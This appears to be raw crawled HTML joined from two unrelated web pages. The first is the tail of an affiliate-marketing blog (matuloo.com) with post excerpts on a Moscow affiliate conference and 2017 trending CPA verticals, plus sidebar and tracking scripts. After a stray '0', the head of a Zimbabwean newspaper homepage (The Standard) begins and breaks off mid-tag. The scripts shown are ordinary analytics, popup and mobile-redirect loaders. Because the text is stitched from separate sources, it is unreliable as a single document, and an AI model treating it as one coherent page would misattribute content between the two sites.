href="http://affiliateconf.com/">http://affiliateconf.com/</a></strong></p> <p>The first Moscow event turned out to be quite a success, there were more than 1200 attendees on the spot &#8230; 180 companies from the affiliate space sent their reps to the conference and more than 30 exhibitors presented their companies directly on the event venue. To increase the value for regular affiliates, 12 industry experts visited the conference and held speeches for the attendees.</p> <h3><strong>To tease you a bit, let&#8217;s take a look at what the first Moscow conference looked like :</strong></h3> <div class="post-readmore"><a class="more-link" href="http://www.matuloo.com/moscow-affiliate-conference-party-autumn-2017-edition/">Continue Reading</a></div> </div> </div> </article><article id="post-523" class="post-523 post type-post status-publish format-standard has-post-thumbnail hentry category-case-studies category-networks category-spying category-uncategorized tag-carousel tag-hot-affiliate-verticals tag-what-works-now tag-working-affiliate-offers"> <div class="post-wrap cf"> <header class="post-header"> <h2 class="post-title"> <a href="http://www.matuloo.com/what-is-hot-in-affiliate-marketing-2nd-half-2017/" title="What is hot in Affiliate Marketing in the 2nd half of 2017?">What is hot in Affiliate Marketing in the 2nd half of 2017?</a> </h2><!-- .post-title --> <div class="post-meta"> <div class="post-meta-inner"> <span class="meta-item menu-item-author"> <span class="posted-by">Posted By </span> <a href="http://www.matuloo.com/author/matuloo/" title="Posts by Matuloo" rel="author">Matuloo</a> </span> <span class="meta-item menu-item-comment"> <a href="http://www.matuloo.com/what-is-hot-in-affiliate-marketing-2nd-half-2017/#comments">2 Comments</a> </span> <span class="meta-item menu-item-date"> September 06, 2017 </span> </div> </div><!-- .post-meta --> </header> <div class="post-image"> <a href="http://www.matuloo.com/what-is-hot-in-affiliate-marketing-2nd-half-2017/" title="What is hot in Affiliate Marketing in the 2nd half of 2017?"> <img width="800" height="533" src="https://i0.wp.com/www.matuloo.com/wp-content/uploads/2017/09/what-is-hot.jpg?fit=800%2C533" class="attachment-large size-large wp-post-image" alt="" srcset="https://i0.wp.com/www.matuloo.com/wp-content/uploads/2017/09/what-is-hot.jpg?w=800 800w, https://i0.wp.com/www.matuloo.com/wp-content/uploads/2017/09/what-is-hot.jpg?resize=300%2C200 300w, https://i0.wp.com/www.matuloo.com/wp-content/uploads/2017/09/what-is-hot.jpg?resize=768%2C512 768w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="525" data-permalink="http://www.matuloo.com/what-is-hot-in-affiliate-marketing-2nd-half-2017/what-is-hot/" data-orig-file="https://i0.wp.com/www.matuloo.com/wp-content/uploads/2017/09/what-is-hot.jpg?fit=800%2C533" data-orig-size="800,533" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="what-is-hot-in-2017" data-image-description="" data-medium-file="https://i0.wp.com/www.matuloo.com/wp-content/uploads/2017/09/what-is-hot.jpg?fit=300%2C200" data-large-file="https://i0.wp.com/www.matuloo.com/wp-content/uploads/2017/09/what-is-hot.jpg?fit=800%2C533" /> </a> </div> <div class="post-content cf"> <h2><span style="color: #ff0000;"><strong>Hello again everyone 🙂</strong></span></h2> <p><strong>Summer is over&#8230;</strong> the days of BBQ, travels and beer are gone, so it&#8217;s time to get back to work again. It&#8217;s not like I wasn&#8217;t running campaigns during the summer, but I&#8217;ve decided to focus more on my family and have some fun. Which was possible <strong>thanks to my colleague</strong>, who managed most of our campaigns in the meantime 🙂</p> <p><strong>Now that I&#8217;m back in the office,</strong> it&#8217;s time to launch some new campaigns and maybe play with some new verticals &#8230;but what should I test, that&#8217;s the question 🙂 What is working now in affiliate marketing, in the second half of 2017?</p> <p>There are several ways to find out, I can check out the <strong>spytools</strong>, which I did already of course. I also see which ones of <strong>our campaigns</strong> are working good, which I check all the time obviously. I could also ask the reps or friends I have at <strong>several <a href="http://www.matuloo.com/what-is-an-affiliate-network-and-should-you-be-using-them-at-all/">Affiliate Networks</a></strong>, as they see directly where the volume goes up and down &#8230; and I did this too already.</p> <p>So&#8230; I got results from the spytools, I see our own data and I have replies from 4 affiliate networks that I work with, in one way or another. And this blog posts will be some kind of summary of what I was able to find out. <strong>Let&#8217;s get stated.</strong></p> <p><strong>NOTE:</strong> I researched regular affiliate offers only, let&#8217;s call them CPA offers. I didn&#8217;t go into eCommerce etc &#8230; <strong><a href="http://www.matuloo.com/affiliate-marketing-offers-can-actually-promote-affiliate-marketer/">Check this article to get a better understanding about affiliate offers.</a></strong></p> <h2><span style="color: #ff0000;"><strong>1. SPYTOOLS</strong></span></h2> <p><strong>These were not much of a surprise actually,</strong> it looks pretty much the same as at the beginning of the year. I&#8217;ve used Adplexity for this, it&#8217;s still the best affiliate marketing spytool at the market in my opinion.</p> <p><strong>Mainstream traffic:</strong> still a lot of utility apps (to my surprise), sweeps, antivirus (mostly cloaked), <strong><a href="http://www.matuloo.com/introduction-to-the-nutra-vertical-with-expert-advice-from-adcombo-com/">nutra products</a></strong> (skincare and diet mostly), gambling/games (this seems to be more popular than before), carrier billing is still everywhere (I expected a decrease here). I found a lot of dating on <strong><a href="http://www.matuloo.com/what-is-native-advertising-and-how-you-can-benefit-from-it/">native networks</a></strong>, seems to be on the rise there.</p> <div class="post-readmore"><a class="more-link" href="http://www.matuloo.com/what-is-hot-in-affiliate-marketing-2nd-half-2017/">Continue Reading</a></div> </div> </div> </article></div><div class="pagination"><span aria-current='page' class='page-numbers current'>1</span> <a class='page-numbers' href='http://www.matuloo.com/page/2/'>2</a> <span class="page-numbers dots">&hellip;</span> <a class='page-numbers' href='http://www.matuloo.com/page/7/'>7</a> <a class="next page-numbers" href="http://www.matuloo.com/page/2/"><i class="fa fa-chevron-right"></i></a></div> </div> </div> <div class="sidebar"> <aside id="optin-monster-api-2" class="widget optin-monster-api cf"><!-- This site is converting visitors into subscribers and customers with OptinMonster - http://optinmonster.com --> <div id="om-n0fsakmhjbawge4e-holder"></div> <script>var n0fsakmhjbawge4e, n0fsakmhjbawge4e_poll = function () { var r = 0; return function (n, l) { clearInterval(r), r = setInterval(n, l) } }(); !function (e, t, n) { if (e.getElementById(n)) { n0fsakmhjbawge4e_poll(function () { if (window['om_loaded']) { if (!n0fsakmhjbawge4e) { n0fsakmhjbawge4e= new OptinMonsterApp(); return n0fsakmhjbawge4e. init({ u : "25614.461119", staging:0, dev :0, beta :0}); } } }, 25); return; } var d = false, o = e.createElement(t); o.id = n, o.src = "//a.optnmnstr.com/app/js/api.min.js", o.async = true, o.onload = o.onreadystatechange = function () { if (!d) { if (!this.readyState || this.readyState === "loaded" || this.readyState === "complete") { try { d = om_loaded = true; n0fsakmhjbawge4e= new OptinMonsterApp();n0fsakmhjbawge4e. init({ u : "25614.461119", staging:0, dev :0, beta :0}); o.onload = o.onreadystatechange = null; } catch (t) { } } } }; (document.getElementsByTagName("head")[0] || document.documentElement).appendChild(o) }(document, "script", "omapi-script");</script><!-- / OptinMonster --></aside><aside id="custom_html-3" class="widget_text widget widget_custom_html cf"><h3 class="widget-title">Looking for an Affiliate Job?</h3><div class="textwidget custom-html-widget"><script> const affjobsFeedSettings = { referralURL: 'http://refer.affjobs.com/82457/6809', // NOTE: Change this to your referral URL. // height: '', // NOTE: Optional. Value should be valid CSS height property, e.g. '300px', '100%', 'auto'. Default is 300px. width: '300', // NOTE: Optional. Value should be valid CSS width property, e.g. '300px', '100%', 'auto'. Default is 250px. }; </script> <script src="https://enigmatic-anchorage-28285.herokuapp.com/feed.affjobs.js"></script> </div></aside><aside id="facebook_page_plugin_widget-2" class="widget widget_facebook_page_plugin_widget cf"><div class="cameronjonesweb_facebook_page_plugin" data-version="1.6.3" data-implementation="widget" id="JoFMCxUnvbARGtb"><div id="fb-root"></div><script>(function(d, s, id) {var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) return;js = d.createElement(s); js.id = id;js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.12&appId=846690882110183";fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script><div class="fb-page" data-href="https://facebook.com/matuloocom/" data-width="300" data-max-width="300" data-height="300" data-hide-cover="false" data-show-facepile="true" data-tabs="timeline" data-hide-cta="false" data-small-header="true" data-adapt-container-width="true"><div class="fb-xfbml-parse-ignore"><blockquote cite="https://www.facebook.com/matuloocom/"><a href="https://www.facebook.com/matuloocom/">https://www.facebook.com/matuloocom/</a></blockquote></div></div></div></aside> <aside id="recent-posts-2" class="widget widget_recent_entries cf"> <h3 class="widget-title">Recent Posts</h3> <ul> <li> <a href="http://www.matuloo.com/whats-working-in-affiliate-marketing-2019-edition/">What&#8217;s working in Affiliate Marketing – 2019 Edition.</a> </li> <li> <a href="http://www.matuloo.com/how-to-make-profitable-campaigns-with-push-notification-traffic-from-megapu-sh/">How to make profitable campaigns with PUSH notification traffic from Megapu.sh</a> </li> <li> <a href="http://www.matuloo.com/meet-manu-cinca-founder-of-the-daily-affiliate-newsletter-wtaff-co-how-it-started-and-where-is-it-going/">Meet Manu Cinca, founder of the daily Affiliate Newsletter WTAFF.co &#8230; how it started and where is it going?</a> </li> <li> <a href="http://www.matuloo.com/promoting-exclusive-dating-offers-topoffers-com/">Promoting exclusive dating offers with TopOffers.Com</a> </li> <li> <a href="http://www.matuloo.com/looking-higher-level-blockchain-conference/">Looking for a higher level Blockchain Conference?</a> </li> </ul> </aside><aside id="archives-2" class="widget widget_archive cf"><h3 class="widget-title">Archives</h3> <ul> <li><a href='http://www.matuloo.com/2019/04/'>April 2019</a></li> <li><a href='http://www.matuloo.com/2018/10/'>October 2018</a></li> <li><a href='http://www.matuloo.com/2018/09/'>September 2018</a></li> <li><a href='http://www.matuloo.com/2018/07/'>July 2018</a></li> <li><a href='http://www.matuloo.com/2018/05/'>May 2018</a></li> <li><a href='http://www.matuloo.com/2017/11/'>November 2017</a></li> <li><a href='http://www.matuloo.com/2017/09/'>September 2017</a></li> <li><a href='http://www.matuloo.com/2017/06/'>June 2017</a></li> <li><a href='http://www.matuloo.com/2017/05/'>May 2017</a></li> <li><a href='http://www.matuloo.com/2017/04/'>April 2017</a></li> <li><a href='http://www.matuloo.com/2017/03/'>March 2017</a></li> <li><a href='http://www.matuloo.com/2017/02/'>February 2017</a></li> <li><a href='http://www.matuloo.com/2017/01/'>January 2017</a></li> <li><a href='http://www.matuloo.com/2016/12/'>December 2016</a></li> <li><a href='http://www.matuloo.com/2016/11/'>November 2016</a></li> <li><a href='http://www.matuloo.com/2016/10/'>October 2016</a></li> </ul> </aside><aside id="recent-comments-2" class="widget widget_recent_comments cf"><h3 class="widget-title">Recent Comments</h3><ul id="recentcomments"><li class="recentcomments"><span class="comment-author-link">Matuloo</span> on <a href="http://www.matuloo.com/what-is-dating-and-how-to-promote-dating-offers/#comment-9724">What is DATING and how to promote dating offers – with expert advice from Cpamatica.com</a></li><li class="recentcomments"><span class="comment-author-link">Shivang Gude</span> on <a href="http://www.matuloo.com/what-is-dating-and-how-to-promote-dating-offers/#comment-8854">What is DATING and how to promote dating offers – with expert advice from Cpamatica.com</a></li><li class="recentcomments"><span class="comment-author-link"><a href='http://www.affiliateghost.com' rel='external nofollow' class='url'>Zidan</a></span> on <a href="http://www.matuloo.com/how-to-make-profitable-campaigns-with-push-notification-traffic-from-megapu-sh/#comment-8807">How to make profitable campaigns with PUSH notification traffic from Megapu.sh</a></li><li class="recentcomments"><span class="comment-author-link">Justas</span> on <a href="http://www.matuloo.com/got-a-great-performing-banner-duplicate-it-let-me-tell-you-how/#comment-7266">Got a great performing banner? Duplicate it! Let me tell you how.</a></li><li class="recentcomments"><span class="comment-author-link">Matuloo</span> on <a href="http://www.matuloo.com/got-a-great-performing-banner-duplicate-it-let-me-tell-you-how/#comment-7265">Got a great performing banner? Duplicate it! Let me tell you how.</a></li></ul></aside><aside id="categories-2" class="widget widget_categories cf"><h3 class="widget-title">Categories</h3> <ul> <li class="cat-item cat-item-29"><a href="http://www.matuloo.com/category/basics/" >BASICS</a> </li> <li class="cat-item cat-item-62"><a href="http://www.matuloo.com/category/blog-stats/" >BLOG STATS</a> </li> <li class="cat-item cat-item-57"><a href="http://www.matuloo.com/category/case-studies/" >CASE STUDIES</a> </li> <li class="cat-item cat-item-191"><a href="http://www.matuloo.com/category/cryptocurrencies/" >Cryptocurrencies</a> </li> <li class="cat-item cat-item-40"><a href="http://www.matuloo.com/category/emailing/" >EMAILING</a> </li> <li class="cat-item cat-item-126"><a href="http://www.matuloo.com/category/events/" >EVENTS</a> </li> <li class="cat-item cat-item-66"><a href="http://www.matuloo.com/category/guides/" >GUIDES</a> </li> <li class="cat-item cat-item-44"><a href="http://www.matuloo.com/category/life/" >LIFE</a> </li> <li class="cat-item cat-item-109"><a href="http://www.matuloo.com/category/networks/" >NETWORKS</a> </li> <li class="cat-item cat-item-56"><a href="http://www.matuloo.com/category/niche-sites/" >NICHE SITES</a> </li> <li class="cat-item cat-item-8"><a href="http://www.matuloo.com/category/offers/" >Offers</a> </li> <li class="cat-item cat-item-31"><a href="http://www.matuloo.com/category/optimization/" >OPTIMIZATION</a> </li> <li class="cat-item cat-item-23"><a href="http://www.matuloo.com/category/research/" >Research</a> </li> <li class="cat-item cat-item-30"><a href="http://www.matuloo.com/category/spying/" >SPYING</a> </li> <li class="cat-item cat-item-61"><a href="http://www.matuloo.com/category/this-blog/" >THIS BLOG</a> </li> <li class="cat-item cat-item-3"><a href="http://www.matuloo.com/category/tracking-campaigns/" >Tracking Campaigns</a> </li> <li class="cat-item cat-item-15"><a href="http://www.matuloo.com/category/traffic/" >Traffic</a> </li> <li class="cat-item cat-item-1"><a href="http://www.matuloo.com/category/uncategorized/" >Uncategorized</a> </li> </ul> </aside> <div class="sticky-sidebar"> </div> </div> </div> </div><!-- .site-content --> <footer class="site-footer"> <div class="container cf"> <div class="footer-copyright"> <div class="colophon"> Copyright (c) 2019 <a href="http://www.matuloo.com/">Online Advertising Tips From Matuloo.Com</a> </div> </div> </div> </footer> </div><!-- .site-wrap --> <!-- analytics-counter google analytics tracking code --><script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-85397135-1', 'auto'); ga('set', 'anonymizeIp', true); ga('send', 'pageview'); </script><!-- --> <div style="display:none"> </div> <!-- This site is converting visitors into subscribers and customers with OptinMonster - http://optinmonster.com --> <div id="om-gzmqdiznajmp3szg-holder"></div> <script>var gzmqdiznajmp3szg, gzmqdiznajmp3szg_poll = function () { var r = 0; return function (n, l) { clearInterval(r), r = setInterval(n, l) } }(); !function (e, t, n) { if (e.getElementById(n)) { gzmqdiznajmp3szg_poll(function () { if (window['om_loaded']) { if (!gzmqdiznajmp3szg) { gzmqdiznajmp3szg= new OptinMonsterApp(); return gzmqdiznajmp3szg. init({ u : "25614.458226", staging:0, dev :0, beta :0}); } } }, 25); return; } var d = false, o = e.createElement(t); o.id = n, o.src = "//a.optnmnstr.com/app/js/api.min.js", o.async = true, o.onload = o.onreadystatechange = function () { if (!d) { if (!this.readyState || this.readyState === "loaded" || this.readyState === "complete") { try { d = om_loaded = true; gzmqdiznajmp3szg= new OptinMonsterApp();gzmqdiznajmp3szg. init({ u : "25614.458226", staging:0, dev :0, beta :0}); o.onload = o.onreadystatechange = null; } catch (t) { } } } }; (document.getElementsByTagName("head")[0] || document.documentElement).appendChild(o) }(document, "script", "omapi-script");</script><!-- / OptinMonster --> <script type="text/javascript">var n0fsakmhjbawge4e_shortcode = true;var gzmqdiznajmp3szg_shortcode = true;</script> <!--[if lte IE 8]> <link rel='stylesheet' id='jetpack-carousel-ie8fix-css' href='http://www.matuloo.com/wp-content/plugins/jetpack/modules/carousel/jetpack-carousel-ie8fix.css?ver=20121024' type='text/css' media='all' /> <![endif]--> <script type='text/javascript' src='http://www.matuloo.com/wp-content/plugins/jetpack/_inc/build/photon/photon.min.js?ver=20130122'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Mayaa'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='http://www.matuloo.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=5.1.1'></script> <script type='text/javascript' src='http://www.matuloo.com/wp-content/themes/articulla/assets/js/plugins.js?ver=5.1.1'></script> <script type='text/javascript' src='http://www.matuloo.com/wp-content/themes/articulla/assets/js/theme.js?ver=5.1.1'></script> <script type='text/javascript' src='http://www.matuloo.com/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <script type='text/javascript' src='http://www.matuloo.com/wp-content/plugins/jetpack/_inc/build/spin.min.js?ver=1.3'></script> <script type='text/javascript' src='http://www.matuloo.com/wp-content/plugins/jetpack/_inc/build/jquery.spin.min.js?ver=1.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"http:\/\/www.matuloo.com\/wp-admin\/admin-ajax.php","nonce":"89e7edd8e8","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"http:\/\/www.matuloo.com\/wp-login.php?redirect_to=http%3A%2F%2Fwww.matuloo.com%2Fhow-to-make-profitable-campaigns-with-push-notification-traffic-from-megapu-sh%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email (Required)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name (Required)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.matuloo.com/wp-content/plugins/jetpack/_inc/build/carousel/jetpack-carousel.min.js?ver=20190102'></script> <script type='text/javascript'> /* <![CDATA[ */ var facebook_page_plugin_language = {"language":"en_US"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.matuloo.com/wp-content/plugins/facebook-page-feed-graph-api/js/sdk.js'></script> <script type='text/javascript' src='http://www.matuloo.com/wp-content/plugins/facebook-page-feed-graph-api/js/responsive.min.js'></script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.0.1',blog:'124596517',post:'0',tz:'0',srv:'www.matuloo.com'} ]); _stq.push([ 'clickTrackerInit', '124596517', '0' ]); </script> <script type="text/javascript">var omapi_localized = { ajax: 'http://www.matuloo.com/wp-admin/admin-ajax.php?optin-monster-ajax-route=1', nonce: '689b55f09c', slugs: {"n0fsakmhjbawge4e":{"slug":"n0fsakmhjbawge4e","mailpoet":false},"gzmqdiznajmp3szg":{"slug":"gzmqdiznajmp3szg","mailpoet":false}} };</script> </body> </html> <!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/ Served from: www.matuloo.com @ 2019-05-16 15:41:43 by W3 Total Cache -->
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <!-- Mafeel Code --> <script>window.mrf={host:"b.marfeel.com",dt:3},function(e,t,o,a,i,r,n){function d(){l&&(e.cookie="fromt=yes;path=/;expires="+new Date(Date.now()+18e5).toGMTString(),o.reload())}var l=!/marfeelgarda=no|fromt=yes/i.test(r+";"+i);if((/(ipad.*?OS )(?!1_|2_|3_|4_|X)|mozilla.*android (?!(1|2|3)\.)[0-9](?!.*mobile)|\bSilk\b/i.test(a)&&2&n.dt||/(ip(hone|od).*?OS )(?!1_|2_|3_|4_|X)|mozilla.*android (?!(1|2|3)\.)[0-9].*mobile|bb10/i.test(a)&&1&n.dt||/marfeelgarda=off/i.test(r))&&t===t.top){l&&e.write('<plaintext style="display:none">');var s="script",m=setTimeout(d,1e4),c=e.createElement(s),f=e.getElementsByTagName(s)[0];c.src="//bc.marfeel.com/statics/marfeel/gardac.js",c.onerror=d,c.onload=function(){clearTimeout(m)},f.parentNode.insertBefore(c,f)}}(document,window,location,navigator.userAgent,document.cookie,location.search,window.mrf);</script> <!-- End Mafeel Code --> <meta property="fb:pages" content="103305193039107" /> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="pingback" href="https://www.thestandard.co.zw/xmlrpc.php" /> <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame --> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <!-- Mobile viewport scale --> <meta content="initial-scale=1.0, maximum-scale=1.0, user-scalable=yes" name="viewport"/> <!-- This site is optimized with the Yoast SEO plugin v5.1 - https://yoast.com/wordpress/plugins/seo/ --> <title>The Standard - Zimbabwe&#039;s Leading Sunday Newspaper</title> <meta name="description" content="Zimbabwe&#039;s Leading Sunday Newspaper"/> <link rel="canonical" href="https://www.thestandard.co.zw/" /> <link rel="next" href="https://www.thestandard.co.zw/page/2/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="The Standard - Zimbabwe&#039;s Leading Sunday Newspaper" /> <meta property="og:description" content="Zimbabwe&#039;s Leading Sunday Newspaper" /> <meta property="og:url" content="https://www.thestandard.co.zw/" /> <meta property="og:site_name" content="The Standard" /> <meta property="og:image" content="http://www.thestandard.co.zw/wp-content/uploads/2012/06/s_logo3.jpg" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Zimbabwe&#039;s Leading Sunday Newspaper" /> <meta name="twitter:title" content="The Standard - Zimbabwe&#039;s Leading Sunday Newspaper" /> <meta name="twitter:site" content="@thestandardzim" /> <meta name="twitter:image" content="http://www.thestandard.co.zw/wp-content/uploads/2012/06/s_logo3.jpg" /> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/www.thestandard.co.zw\/","name":"The Standard","potentialAction":{"@type":"SearchAction","target":"https:\/\/www.thestandard.co.zw\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//www.thestandard.co.zw' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="The Standard &raquo; Feed" href="https://www.thestandard.co.zw/feed/" /> <link rel="alternate" type="application/rss+xml" title="The Standard &raquo; Comments Feed" href="https://www.thestandard.co.zw/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.thestandard.co.zw\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.9"}}; !function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,56826,8203,55356,56819),0,0),c=j.toDataURL(),b!==c&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55358,56794,8205,9794,65039),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55358,56794,8203,9794,65039),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='audio4-html5_site_css-css' href='https://www.thestandard.co.zw/wp-content/plugins/lbg-audio4-html5-shoutcast/audio4_html5/audio4_html5.css?ver=4.8.9' type='text/css' media='all' /> <link rel='stylesheet' id='fsb-image-css' href='https://www.thestandard.co.zw/wp-content/plugins/simple-full-screen-background-image/includes/fullscreen-image.css?ver=4.8.9' type='text/css' media='all' /> <link rel='stylesheet' id='woodojo_tabs-css' href='https://www.thestandard.co.zw/wp-content/plugins/woodojo/bundled/woodojo-tabs/assets/css/style.css?ver=4.8.9' type='text/css' media='all' /> <link rel='stylesheet' id='theme-stylesheet-css' href='https://www.thestandard.co.zw/wp-content/themes/thestandard-child/style.css?ver=5.2.0' type='text/css' media='all' /> <link rel='stylesheet' id='woo-layout-css' href='https://www.thestandard.co.zw/wp-content/themes/thestandard-child/css/layout.css?ver=4.8.9' type='text/css' media='all' /> <link rel='stylesheet' id='ad_module_css-css' href='https://www.thestandard.co.zw/wp-content/plugins/ad-module/css/ads.min.css?ver=4.8.9' type='text/css' media='all' /> <!--[if lt IE 9]> <link href="https://www.thestandard.co.zw/wp-content/themes/canvas/css/non-responsive.css" rel="stylesheet" type="text/css" /> <style type="text/css">.col-full, #wrapper { width: 1000px; max-width: 1000px; } #inner-wrapper { padding: 0; } body.full-width #header, #nav-container, body.full-width #content, body.full-width #footer-widgets, body.full-width #footer { padding-left: 0; padding-right: 0; } body.fixed-mobile #top, body.fixed-mobile #header-container, body.fixed-mobile #footer-container, body.fixed-mobile #nav-container, body.fixed-mobile #footer-widgets-container { min-width: 1000px; padding: 0 1em; } body.full-width #content { width: auto; padding: 0 1em;}</style> <![endif]--> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-content/plugins/lbg-audio4-html5-shoutcast/audio4_html5/js/jquery.mousewheel.min.js?ver=4.8.9'></script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-content/plugins/lbg-audio4-html5-shoutcast/audio4_html5/js/jquery.touchSwipe.min.js?ver=4.8.9'></script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-content/plugins/lbg-audio4-html5-shoutcast/audio4_html5/js/swfobject.js?ver=4.8.9'></script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-content/plugins/lbg-audio4-html5-shoutcast/audio4_html5/js/lastfm.api.js?ver=4.8.9'></script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-content/plugins/lbg-audio4-html5-shoutcast/audio4_html5/js/lastfm.api.cache.js?ver=4.8.9'></script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-content/plugins/lbg-audio4-html5-shoutcast/audio4_html5/js/lastfm.api.md5.js?ver=4.8.9'></script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-content/plugins/lbg-audio4-html5-shoutcast/audio4_html5/js/audio4_html5.js?ver=4.8.9'></script> <script type='text/javascript' 